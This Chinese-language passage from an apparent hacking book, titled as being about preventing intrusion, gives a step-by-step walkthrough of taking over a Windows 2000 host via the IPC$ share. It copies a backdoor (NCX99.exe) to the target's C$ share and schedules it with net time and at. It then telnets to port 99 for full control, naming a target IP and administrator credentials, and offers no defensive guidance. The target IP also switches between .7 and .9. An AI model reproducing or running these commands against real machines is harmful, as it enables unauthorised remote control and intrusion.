黑客攻防技术内幕-防止入侵的方法(2)

6.1.2  基于IPC$中级入侵

6.1.1节我们了解了基于IPC$共享入侵的简单入侵，本小节结合上一小节内容来深入来了解一下基于IPC$共享的中级入侵。

1. 入侵测试目标：

测试主机：61.150.115.7(Windows2000)

用户名：System32(隶属Administrators组)

口令：ffhh.net

2. 入侵测试所用程序：

●      Windows NT下的：command.com

●      Windows 2000下的：命令提示符(即:cmd.exe)

●      后门程序：NCX99.exe (用于远程登录到目标服务器的99号端口)

3. 入侵测试：

所用系统为：Windows 2000 Professional

例如，通过IPC$共享和远程61.150.115.7建立了远程连接(请参阅上一章节)，所得到的是可以控制其硬盘读写操作，但是一个入侵者不会就此停手，还会进一步地控制目标机，接下来看看入侵者是如何完全控制目标机的。

(1) 在命令提示符下输入如下命令格式：

copy d:\hacker\ncx99.exe \\61.150.115.9\c$

命令解释：

将本地D盘hacker文夹下的NCX99.exe程序复制到61.150.115.9的C盘下。

输入完毕后按Enter键，等待几秒钟后将会显示文件已复制，如图6-14所示。

图6-14  在命令提示符下向目标机复制文件

注：

这里也可以通过将目标机61.150.115.9中的C盘映射到本地盘，然后直接复制过去，如图6-15所示。

图6-15  通过映射将ncx.exe程序复制到目标机

通过图6-16可以看到NCX.exe成功地添加到目标机的C盘下。

(2) 在命令提示符下输入如下命令格式：

net time \\61.150.115.9

图6-16  NCX99.exe成功地被复制到目标机的C盘下

命令解释：

查看目标机61.150.115.9上的时间。

输入完毕后按Enter键，将会显示目标机现在的时间，如图6-17所示。

图6-17  查看目标机上的时间

注：

屏幕上现在显示的时间是下午03:27，但是系统所采用的是24小时制，那么现在目标机上的时间就是15:27。

(3) 在命令提示符下输入如下命令格式：

at \\61.150.115.9 15:29 c:\ncx99.exe

命令解释：

让61.150.115.9在15:29时执行ncx99.exe程序，也就将ncx99.exe添加到目标机的计划任务中，让它在15:29时自动运行。

输入完毕后按Enter键，将出现新加了一项作业的字样，如图6-18所示。

图6-18  添加计划任务

注意：

通过net time \\61.150.115.9得知目标服务器上的时间是15:27，但在添加计划任务时将时间设为15:29，这是因为本地到远程传输时需一定的时间，为了确保NCX99.exe的运行，因此将计划执行的时间向后推2分钟。在这里也可以通过如下命令查看计划是否被添加：

at \\61.150.115.9

命令解释：

查看目标机计划任务列表输入完毕后，按Enter键即可看到如图6-19所示，计划被成功添加。

图6-19  查看目标机计划任务列表

(4) 过2分钟后，在命令提示符下输入如下命令格式：

telnet 61.150.115.9 99

则如图6-20所示的画面。

图6-20  通过99号端口远程登录到目标机

命令解释：

目标服务器执行NCX99.exe后，就会在本机开启一个99号端口，用于远程登录。

命令输入完毕后按下Enter键，即可远程登录到目标机，如图6-21所示。

图6-21  远程登录到目标机

此时已完全控制了目标机。

(5) 入侵检测成功完成！